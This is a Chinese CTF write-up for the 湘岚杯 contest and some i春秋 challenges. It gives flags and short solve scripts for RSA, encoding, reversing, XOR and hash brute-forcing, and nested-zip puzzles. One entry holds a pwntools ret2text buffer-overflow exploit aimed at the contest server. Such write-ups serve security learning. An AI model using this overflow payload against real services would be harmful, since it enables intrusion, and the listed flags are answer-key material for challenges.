湘岚杯
别呀啦(签到)
直接解压就行
XLCTF{xnnxixixi6-666-666-love}
RSA就是数学口牙(签到)
题目给出p+q,(p+1)(q+1),e和c。
首先需要求出phi,然后求解d,最后再求解m。
phi = (p-1)(q-1)
= pq - (p+q) + 1
p+q的值题目已经给出了,接下来只需要求出pq的值即可求出phi的值。题目还给出了(p+1)(q+1),我们考虑下pq是否可以表示为(p+1)(q+1)的形式:
(p+1)(q+1) = pq + p + q + 1
= pq + (p+q) + 1
那么pq就可以表示为:
pq = (p+1)(q+1) - (p+q) -1
然后,求解phi的值。
phi = (p-1)(q-1)
= pq - (p+q) + 1 = n - (p+q) + 1
import gmpy2 p =#被小男娘偷走了 q =#被小男娘摸走了 n = p * q phi = (p - 1) * (q - 1) m =#nian e = 0xe6b1bee47bd63f615c7d0a43c529d219 d = gmpy2.invert(e, phi) print(hex(p+q)) print(hex((p+1)*(q+1))) print(hex(pow(m,e,n))) 0x1232fecb92adead91613e7d9ae5e36fe6bb765317d6ed38ad890b4073539a6231a6620584cea5730b5af83a3e80cf30141282c97be4400e33307573af6b25e2ea 0x5248becef1d925d45705a7302700d6a0ffe5877fddf9451a9c1181c4d82365806085fd86fbaab08b6fc66a967b2566d743c626547203b34ea3fdb1bc06dd3bb765fd8b919e3bd2cb15bc175c9498f9d9a0e216c2dde64d81255fa4c05a1ee619fc1fc505285a239e7bc655ec6605d9693078b800ee80931a7a0c84f33c851740 0x21bfef2961c512fbb81fd75ca1c38cbc810dee21d04de1e749c9a24cc975447acc1098228108f25a5ab4840212b2c0f305aabb17ee6835599425ffeedb85698ff9edbc70d9e87acd5232526304948f806c0283776d3eb217599e06616a12d899b14723bfeb29becb10e464247760f828463eb4f0536244771c648b6445fab855
import gmpy2 # 已知的值 p_add_q_hex = "0x1232fecb92adead91613e7d9ae5e36fe6bb765317d6ed38ad890b4073539a6231a6620584cea5730b5af83a3e80cf30141282c97be4400e33307573af6b25e2ea" pq_product_plus_one_hex = "0x5248becef1d925d45705a7302700d6a0ffe5877fddf9451a9c1181c4d82365806085fd86fbaab08b6fc66a967b2566d743c626547203b34ea3fdb1bc06dd3bb765fd8b919e3bd2cb15bc175c9498f9d9a0e216c2dde64d81255fa4c05a1ee619fc1fc505285a239e7bc655ec6605d9693078b800ee80931a7a0c84f33c851740" c_hex = "0x21bfef2961c512fbb81fd75ca1c38cbc810dee21d04de1e749c9a24cc975447acc1098228108f25a5ab4840212b2c0f305aabb17ee6835599425ffeedb85698ff9edbc70d9e87acd5232526304948f806c0283776d3eb217599e06616a12d899b14723bfeb29becb10e464247760f828463eb4f0536244771c648b6445fab855" e = 0xe6b1bee47bd63f615c7d0a43c529d219 # 将已知的十六进制字符串转换为整数 p_add_q = int(p_add_q_hex, 16) pq_product_plus_one = int(pq_product_plus_one_hex, 16) c = int(c_hex, 16) # 计算 n n = pq_product_plus_one - p_add_q - 1 # 计算 phi(n) phi = n - p_add_q + 1 # 计算 d d = gmpy2.invert(e, phi) # 解密密文 c m = pow(c, d, n) # 将 mpz 对象转换为 int 类型 m_int = int(m) # 将明文 m 转换为字节 m_bytes = m_int.to_bytes((m_int.bit_length() + 7) // 8, 'big') # 将字节转换为 ASCII 码 m_ascii = m_bytes.decode('utf-8') # 打印结果 print(f"p + q: {hex(p_add_q)}") print(f"(p+1)(q+1): {hex(pq_product_plus_one)}") print(f"n: {hex(n)}") print(f"phi(n): {hex(phi)}") print(f"d: {hex(d)}") print(f"解密后的明文 m: {hex(m)}") print(f"解密后的明文 m (ASCII): {m_ascii}")
flag{Aurora_CAL}
你真的懂社会主义核心价值观吗
平等法治自由平等法治爱国自由自由平等公正自由平等平等友善自由和谐法治平等和谐自由爱国平等公正法治平等平等敬业平等法治和谐平等自由法治公正民主平等爱国自由诚信富强法治友善自由公正自由自由平等和谐平等法治公正公正和谐公正诚信和谐和谐民主公正爱国公正文明自由公正平等公正法治平等公正民主平等爱国平等友善自由公正友善公正公正和谐公正友善爱国自由友善爱国法治富强公正自由自由爱国公正友善公正法治富强公正和谐和谐和谐平等诚信富强公正友善公正公正和谐公正友善爱国公正友善公正公正敬业平等友善自由平等法治自由公正和谐民主公正自由自由法治公正诚信文明公正诚信和谐公正自由平等法治法治爱国和谐敬业
base64:
XLCTF{HunanFirstNormalUniversityisverybeautiful}
ret2text签到
忘截屏了就是简单的签到题
from pwn import* p=remote('xlctf.huhstsec.top',22074) payload=b'A'*(0X0A+8)+p64(0x40115A) p.sendline(payload) p.interactive()
ezbase
脱壳,但是不一般的壳,改成55 50 58
upx.exe -d ezbase.exe脱壳
密文8CJJ8z918CyC3HtzObOJcov3B2Sh8upqNu6ic/hxZjeJcotz8CkJcoY9
自定义base64密码表:Fvm/RkQucZNVyYABpS2w6enjdtGPO8UalxrbD45Ci07MT9KLEJo1h3zHgfX+WqsI
先异或再base64,逆过来先base64再异或
但是这个不是正确答案;为什么
因为第13和第19个字母换了位置
flag{cfc7cffb-a30e-4ddd-8e80-15ea36ffaa33}
i春秋
简单算术
xor爆破就行
def xor_decrypt(ciphertext, key): decrypted = bytearray() for byte in ciphertext: decrypted.append(byte ^ key) return decrypted.decode('utf-8', errors='ignore') def brute_force(ciphertext): for key in range(256): # 尝试所有可能的单字节密钥 decrypted_text = xor_decrypt(ciphertext, key) if "flag{" in decrypted_text and decrypted_text.endswith('}'): print(f"Key: {key}, Decrypted: {decrypted_text}") return decrypted_text return None # 将字符串转换为字节序列 ciphertext = "ys~xdg/m@]mjkz@vl@z~lf>b" ciphertext_bytes = bytes(ciphertext, 'utf-8') # 执行爆破 result = brute_force(ciphertext_bytes) if result: print("破解成功!") else: print("未找到匹配的密钥。")
flag{x0r_Brute_is_easy!}
通往哈希的旅程
import hashlib # 截获的哈希值 target_hash = "" # 生成11位电话号码的范围 start = 18800000000 end = 18899999999 # 遍历所有可能的11位电话号码 for number in range(start, end + 1): # 将数字转换为字符串 number_str = str(number) # 计算SHA1哈希值 hash_object = hashlib.sha1(number_str.encode()) hash_hex = hash_object.hexdigest() # 检查哈希值是否匹配 if hash_hex == target_hash: print(f"找到匹配的号码: {number_str}") print(f"提交格式: flag{ { {number_str}}}") break else: print("没有找到匹配的号码")
flag{18876011645}
压力大,写个脚本吧
递归爆破,密码在password中,不过需要base64解码
import os import zipfile import base64 def read_password(file_path): if not os.path.exists(file_path): print(f"文件不存在: {file_path}") return None with open(file_path, 'r') as file: base64_password = file.read().strip() password = base64.b64decode(base64_password).decode('utf-8') return password def extract_zip(zip_path, password, extract_to): if not os.path.exists(zip_path): print(f"压缩包不存在: {zip_path}") return with zipfile.ZipFile(zip_path, 'r') as zip_ref: zip_ref.extractall(extract_to, pwd=password.encode('utf-8')) def recursive_extract(base_dir, start_zip, start_password_file): current_zip = start_zip current_password_file = start_password_file n = 99 # 从99开始递减 while True: # 读取密码 password = read_password(current_password_file) if password is None: break # 解压当前压缩包 extract_to = os.path.join(base_dir, f"zip_{n}") os.makedirs(extract_to, exist_ok=True) extract_zip(current_zip, password, extract_to) # 更新当前压缩包路径和密码文件路径 n -= 1 if n < 0: break current_zip = os.path.join(base_dir, f"zip_{n+1}", f"zip_{n}.zip") current_password_file = os.path.join(base_dir, f"zip_{n+1}", f"password_{n}.txt") # 基础目录 base_dir = r"E:\练习\zip_100" # 起始压缩包和密码文件 start_zip = os.path.join(base_dir, "zip_99.zip") start_password_file = os.path.join(base_dir, "password_99.txt") # 开始递归解压 recursive_extract(base_dir, start_zip, start_password_file)
越看越不会,,,,,
但是89504E470D0A1A0A0000000D494844520000019000000190最后一个有文件头,哈哈哈哈哈哈哈哈哈哈哈哈哈哈哈哈哈哈哈逆序一下。。。。。。。。。。。。。。。。。。。。。。
import os import zipfile import base64 def read_password(file_path): if not os.path.exists(file_path): print(f"文件不存在: {file_path}") return None with open(file_path, 'r') as file: base64_password = file.read().strip() password = base64.b64decode(base64_password).decode('utf-8') return password def extract_zip(zip_path, password, extract_to): if not os.path.exists(zip_path): print(f"压缩包不存在: {zip_path}") return with zipfile.ZipFile(zip_path, 'r') as zip_ref: zip_ref.extractall(extract_to, pwd=password.encode('utf-8')) def recursive_extract(base_dir, start_zip, start_password_file): current_zip = start_zip current_password_file = start_password_file n = 99 # 从99开始递减 decoded_passwords = [] # 用于收集解码后的密码 while True: # 读取密码 password = read_password(current_password_file) if password is None: break # 收集解码后的密码 decoded_passwords.append(password) # 解压当前压缩包 extract_to = os.path.join(base_dir, f"zip_{n}") os.makedirs(extract_to, exist_ok=True) extract_zip(current_zip, password, extract_to) # 更新当前压缩包路径和密码文件路径 n -= 1 if n < 0: break current_zip = os.path.join(base_dir, f"zip_{n+1}", f"zip_{n}.zip") current_password_file = os.path.join(base_dir, f"zip_{n+1}", f"password_{n}.txt") # 反转列表以得到从password_1到password_100的顺序 decoded_passwords.reverse() # 将所有解码后的密码拼接成一个字符串 all_passwords = ''.join(decoded_passwords) print(f"所有解码后的密码: {all_passwords}") # 基础目录 base_dir = r"E:\练习\zip_100" # 起始压缩包和密码文件 start_zip = os.path.join(base_dir, "zip_99.zip") start_password_file = os.path.join(base_dir, "password_99.txt") # 开始递归解压 recursive_extract(base_dir, start_zip, start_password_file)
flag{ PASSWORDs_is_fl@g!}
See anything in these pics?
爆破压缩包,密码是5FIVE
Foremost提取出来一张黑色的png(随波逐流)
然后改宽高(随波逐流)
flagfopium_00pium}